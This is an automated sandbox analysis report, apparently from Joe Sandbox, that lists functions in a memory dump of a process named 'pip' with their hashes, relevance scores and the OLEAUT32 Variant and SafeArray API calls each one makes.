Instruction ID: 0f9700e9e8f29cebc82c2c91910a563539377e4921116aa439533ac3b397d19a
Opcode Fuzzy Hash: 199aeaa842ea35f2d370784dfb6e069bd4b799b5a0b22e0d98d41e8b2ace551d
Instruction Fuzzy Hash: 9881AF71A01219AFDB04EFA8C890FEEBBB9FF49708F144559E905E7740DB31A905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CF064D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CF0650C
VariantInit.OLEAUT32(?), ref: 6CF06519
VariantInit.OLEAUT32(?), ref: 6CF06520
SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6CF06531
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF0656D
VariantClear.OLEAUT32(?), ref: 6CF06576
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF065B6
VariantClear.OLEAUT32(?), ref: 6CF065BF
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF06666
VariantClear.OLEAUT32(?), ref: 6CF06677
VariantClear.OLEAUT32(?), ref: 6CF0667E
VariantClear.OLEAUT32(?), ref: 6CF06685

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: 4d2178e1bba84ba5aa1228e1f0060c1ca10d6a273d56b4bf1d5d8acae87b5d05
Instruction ID: 8c5957ce8f9ed5e9ecc2408cd4d19ba21243c28c48b63bce43a3f10dcf8f9ac7
Opcode Fuzzy Hash: 4d2178e1bba84ba5aa1228e1f0060c1ca10d6a273d56b4bf1d5d8acae87b5d05
Instruction Fuzzy Hash: 8A5127726183059FC701DF65C890A6BBBF8EFCA704F108A1DF96587250DB71E906DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0CB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF0CBCA
VariantInit.OLEAUT32(?), ref: 6CF0CBD3
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF0CBE4
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF0CBF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF0CC0D
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CF0CC39
VariantClear.OLEAUT32(?), ref: 6CF0CC42
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CF0CC5D
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CF0CC77
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF0CCEC
VariantClear.OLEAUT32(?), ref: 6CF0CCFC
VariantClear.OLEAUT32(?), ref: 6CF0CD02

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
String ID:
API String ID: 3548156019-0
Opcode ID: 6a2c66654856ac6dc9425ba9fa46aa320f02d44790abe8f9ee669eb4225f157a
Instruction ID: 9a29cb2fb8e0fdf2a1b6ce96f21e294633f114467cb95c50ad7287098a3cb848
Opcode Fuzzy Hash: 6a2c66654856ac6dc9425ba9fa46aa320f02d44790abe8f9ee669eb4225f157a
Instruction Fuzzy Hash: 585150B5E002499FDB00DFA9C894EEEBFB8FF49714F00815AEA15A7340D770A905DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFA350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEFA393
VariantInit.OLEAUT32(?), ref: 6CEFA39A
VariantInit.OLEAUT32(?), ref: 6CEFA3A1
VariantCopy.OLEAUT32(?,?), ref: 6CEFA3EF
VariantClear.OLEAUT32(?), ref: 6CEFA409
VariantClear.OLEAUT32(?), ref: 6CEFA50A
VariantClear.OLEAUT32(?), ref: 6CEFA511
VariantClear.OLEAUT32(?), ref: 6CEFA518
VariantClear.OLEAUT32(?), ref: 6CEFA55E
VariantClear.OLEAUT32(?), ref: 6CEFA565
VariantClear.OLEAUT32(?), ref: 6CEFA56C

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Clear$Init$Copy
String ID:
API String ID: 3214764494-0
Opcode ID: cf8ef39661dc95350a95fb2ecf372d654f2439a68807f3197fd79f3fae00ee7c
Instruction ID: 447d0befeaab8b09ebcfc53dc200a41822921a0b16ab710995ef07c9979ecc1f
Opcode Fuzzy Hash: cf8ef39661dc95350a95fb2ecf372d654f2439a68807f3197fd79f3fae00ee7c
Instruction Fuzzy Hash: D37136726483419FD304DF69C880A5AB7F9BF89714F108A5DFAA5CB790D730E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0CD20 Relevance: 15.5, APIs: 10, Instructions: 485
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF0CD5C
VariantInit.OLEAUT32(?), ref: 6CF0CD65
VariantInit.OLEAUT32(?), ref: 6CF0CD6B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF0CD76
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF0CDAA
VariantClear.OLEAUT32(?), ref: 6CF0CDB7
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF0D2A5
VariantClear.OLEAUT32(?), ref: 6CF0D2B5
VariantClear.OLEAUT32(?), ref: 6CF0D2BB
VariantClear.OLEAUT32(?), ref: 6CF0D2C1

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: bf8fede6ae9ebcd305f4fa1ecab67299bce96d6304d354d0b788bbcb5f1489b5
Instruction ID: 9e9e255e360aa71a8fe9fe335f82717ec31b7517a1d104f0f2d1354df9212581
Opcode Fuzzy Hash: bf8fede6ae9ebcd305f4fa1ecab67299bce96d6304d354d0b788bbcb5f1489b5
Instruction Fuzzy Hash: 2F121675A11705AFC758DBA8DD94DAAB3B9BF8C300F14466CF50AABB91CA30F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF047D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF0480C
VariantInit.OLEAUT32(?), ref: 6CF04815
VariantInit.OLEAUT32(?), ref: 6CF0481B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF04826
SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6CF0485B
VariantClear.OLEAUT32(?), ref: 6CF04868
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF04974
VariantClear.OLEAUT32(?), ref: 6CF04984
VariantClear.OLEAUT32(?), ref: 6CF0498A
VariantClear.OLEAUT32(?), ref: 6CF04990

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 94233a5e1335745388572ff080467959c15c7a4d73c924a6cdfee0af62a97bcf
Instruction ID: b1ae056422d3b67adee0a4c5011a8b60c6f42c24f0034f4183ee2d3af6bb2cf8
Opcode Fuzzy Hash: 94233a5e1335745388572ff080467959c15c7a4d73c924a6cdfee0af62a97bcf
Instruction Fuzzy Hash: FC517C72A002099FDB04DFA4CC90EEEBBB9FF99714F14456DE505EB640D730A905DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CF066A0 Relevance: 15.2, APIs: 10, Instructions: 155COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6CF066DB
VariantInit.OLEAUT32 ref: 6CF066EA
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF06700
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF0673A
VariantClear.OLEAUT32(?), ref: 6CF06747
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF06787
VariantClear.OLEAUT32(?), ref: 6CF06794
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF06849
VariantClear.OLEAUT32(?), ref: 6CF0685A
VariantClear.OLEAUT32(?), ref: 6CF06861

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
String ID:
API String ID: 551789342-0
Opcode ID: d4f9bab8ea21a8ae99c5d1ba2270611d7bd26c8e5ae5776bc16c92a4121e6b55
Instruction ID: 14575b250fbda3c61c5f33c14220168406c7dfb9dfa0e58499db8a6ea2139b2b
Opcode Fuzzy Hash: d4f9bab8ea21a8ae99c5d1ba2270611d7bd26c8e5ae5776bc16c92a4121e6b55
Instruction Fuzzy Hash: F3518876608202AFC701DF64C854B9BBBF8FF89B14F118A19F954DB250DB30E905DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0840E Relevance: 13.8, APIs: 9, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF084BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF084D2
SafeArrayGetElement.OLEAUT32 ref: 6CF0850A

Part of subcall function 6CF03A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF03B71
Part of subcall function 6CF03A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF03B83

Part of subcall function 6CF069C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF06A08
Part of subcall function 6CF069C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF06A15
Part of subcall function 6CF069C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF06A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Part of subcall function 6CEFDFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEFDFF6
Part of subcall function 6CEFDFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEFE003
Part of subcall function 6CEFDFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEFE02F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID:
API String ID: 959723449-0
Opcode ID: b54811889ecc9ab878f9a55ce0e298a1d7d1b850f197a90d77be381edb896d09
Instruction ID: daeb2cc01ce2aa5eba251d9d107c944ba2da2babbbd9252c404a6847e8e61d6e
Opcode Fuzzy Hash: b54811889ecc9ab878f9a55ce0e298a1d7d1b850f197a90d77be381edb896d09
Instruction Fuzzy Hash: 63C18F70B012049FDB10CF69CCA0FA9B7B9AF84708F208599E919EB786DB71ED45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF04170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF041AF
VariantInit.OLEAUT32(?), ref: 6CF041B5
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF041C0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF041F5
VariantClear.OLEAUT32(?), ref: 6CF04201
std::tr1::_Xweak.LIBCPMT ref: 6CF04450
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0446D
VariantClear.OLEAUT32(?), ref: 6CF0447D
VariantClear.OLEAUT32(?), ref: 6CF04483

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: a0a233f4d87175df7c1db1510feded874457f24cb7502752f023cd24692f7f2b
Instruction ID: 47bf258d649bb8057444e3970b7d45fcf1c542ecd58b0e078a7575c02371f7a8
Opcode Fuzzy Hash: a0a233f4d87175df7c1db1510feded874457f24cb7502752f023cd24692f7f2b
Instruction Fuzzy Hash: F7B15975600609AFCB14DF99C884EEAB7F5BF8D300F15856CE50AABB90DA34F841DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0C850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF0C88F
VariantInit.OLEAUT32(?), ref: 6CF0C895
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF0C8A0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF0C8D5
VariantClear.OLEAUT32(?), ref: 6CF0C8E1
std::tr1::_Xweak.LIBCPMT ref: 6CF0CB1C
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0CB39
VariantClear.OLEAUT32(?), ref: 6CF0CB49
VariantClear.OLEAUT32(?), ref: 6CF0CB4F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: fcb49ada7ffcaa6c5dbb5f9680f2cc4b36f9b8b4da298dbf1e30f499399b3a51
Instruction ID: 3d55d6172818d0632c495c0afac78bd780e9a714bfe8d1ba1c3e6fa6f6b4ca4a
Opcode Fuzzy Hash: fcb49ada7ffcaa6c5dbb5f9680f2cc4b36f9b8b4da298dbf1e30f499399b3a51
Instruction Fuzzy Hash: 56B13975A006099FCB14EF99C894EAAB7F5BF8D300F15866CE506ABB91C634F841DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0C530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF0C56F
VariantInit.OLEAUT32(?), ref: 6CF0C575
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF0C580
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF0C5B5
VariantClear.OLEAUT32(?), ref: 6CF0C5C1
std::tr1::_Xweak.LIBCPMT ref: 6CF0C7D4
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0C7F1
VariantClear.OLEAUT32(?), ref: 6CF0C801
VariantClear.OLEAUT32(?), ref: 6CF0C807

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 3033c1eb2c2813481cb189f4f2558148333fa85a7c13a769877af820e96c10b2
Instruction ID: 00dbd4525a282f4f31b326ba57b4b2f23773b6d596da7b5ba4d4a6b2d8aeca3d
Opcode Fuzzy Hash: 3033c1eb2c2813481cb189f4f2558148333fa85a7c13a769877af820e96c10b2
Instruction Fuzzy Hash: 9CA14A75A006099FCB14EF99C894EEAB7F5BF8D310F158568E506ABB50CB34F841DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF06880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF068B2
VariantInit.OLEAUT32(?), ref: 6CF068BD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF068D7
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF068FD
VariantClear.OLEAUT32(?), ref: 6CF06909
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF06923
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF06981
VariantClear.OLEAUT32(?), ref: 6CF0699E
VariantClear.OLEAUT32(?), ref: 6CF069A4

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
String ID:
API String ID: 3529038988-0
Opcode ID: 8c8df50db569755c5525f64ee30a57602f1367f46b893dbd82ba6b6f88d27bbe
Instruction ID: 1c1a5995764ea28b37847f72a7916145b329e18d5c0bf8973433f510153af78f
Opcode Fuzzy Hash: 8c8df50db569755c5525f64ee30a57602f1367f46b893dbd82ba6b6f88d27bbe
Instruction Fuzzy Hash: 65419EB2E00209AFDB01DFA5C844EEEBBB8FF99714F158119E915E7340E771A905DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFC020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEFC074
VariantInit.OLEAUT32(?), ref: 6CEFC07B
VariantInit.OLEAUT32(?), ref: 6CEFC082
VariantInit.OLEAUT32(?), ref: 6CEFC089
VariantClear.OLEAUT32(?), ref: 6CEFC312
VariantClear.OLEAUT32(?), ref: 6CEFC319
VariantClear.OLEAUT32(?), ref: 6CEFC320
VariantClear.OLEAUT32(?), ref: 6CEFC327

Memory Dump Source

